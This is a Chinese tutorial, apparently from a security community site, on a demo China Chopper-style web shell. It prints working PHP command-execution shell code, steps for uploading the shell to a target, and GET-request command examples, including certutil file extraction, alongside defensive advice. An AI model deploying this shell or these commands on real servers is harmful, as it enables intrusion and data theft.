奇安信攻防社区-Demo版菜刀分析及使用教学

1. 工具概述

Demo版菜刀是一款基于Web的渗透测试工具，主要用于Web应用的安全测试。当前版本为演示版，具有以下特点：

• 采用明文传输（未加密）
• 连接判断基于响应(response)而非更安全的机制
• 使用HTTP请求方法为GET（request方法）
• 功能相对基础，后续版本(demo2)将增加：
  • 加密通信
  • 大文件传输支持
  • 断点续传功能
  • SOCKS代理功能

2. 核心功能实现

2.1 连接机制

当前版本通过简单的响应判断连接是否成功：

// 示例连接验证代码
if(isset($_REQUEST['pass'])){
    if($_REQUEST['pass'] == 'password'){
        echo 'ok';
    }
}

2.2 通信方式

• 使用HTTP GET请求传输数据（不安全）
• 参数直接附加在URL中
• 示例请求格式：http://target.com/shell.php?pass=password&cmd=whoami

2.3 基本命令执行

通过cmd参数执行系统命令：

// 命令执行核心代码
if(isset($_REQUEST['cmd'])){
    system($_REQUEST['cmd']);
}

3. 使用教程

3.1 基础使用步骤

1. 上传WebShell到目标服务器
2. 通过GET请求与Shell交互：

   http://target.com/shell.php?pass=password&cmd=命令
   

3. 服务器响应将包含命令执行结果

3.2 常用操作示例

• 查看当前用户：&cmd=whoami
• 列出目录：&cmd=dir (Windows) 或 &cmd=ls -la (Linux)
• 读取文件：&cmd=type 文件名 或 &cmd=cat 文件名
• 写入文件：&cmd=echo "内容" > 文件

3.3 文件管理

当前版本文件传输限制：

• 仅支持小文件传输
• 无断点续传功能
• 示例文件下载：

  &cmd=certutil -encode 源文件 输出文件
  

  然后读取编码后的文件内容

4. 安全注意事项

由于当前版本存在严重安全问题：

1. 通信明文传输：所有数据可被中间人窃取
2. 无认证加密：仅简单密码验证，易被爆破
3. 日志记录明显：GET请求会记录在Web日志中

建议仅在测试环境使用，生产环境等待加密版本(demo2)。

5. 后续版本(demo2)改进方向

1. 加密通信：采用AES等加密算法保护传输数据
2. 大文件支持：分块传输大文件
3. 断点续传：支持文件传输中断后继续
4. SOCKS代理：建立代理通道进行内网渗透
5. POST请求：改用POST方法减少日志暴露

6. 防御措施

针对此类工具的防护建议：

1. 监控异常GET请求，特别是包含cmd、pass等参数
2. 限制系统命令执行函数的使用
3. 定期检查服务器上的可疑WebShell文件
4. 实施严格的输入过滤和输出编码

7. 总结

Demo版菜刀作为概念验证工具，展示了WebShell的基本原理，但因安全性不足仅适合研究学习。实际渗透测试应使用更成熟的加密工具，并遵守法律法规。期待demo2版本在通信安全和功能完善上的改进。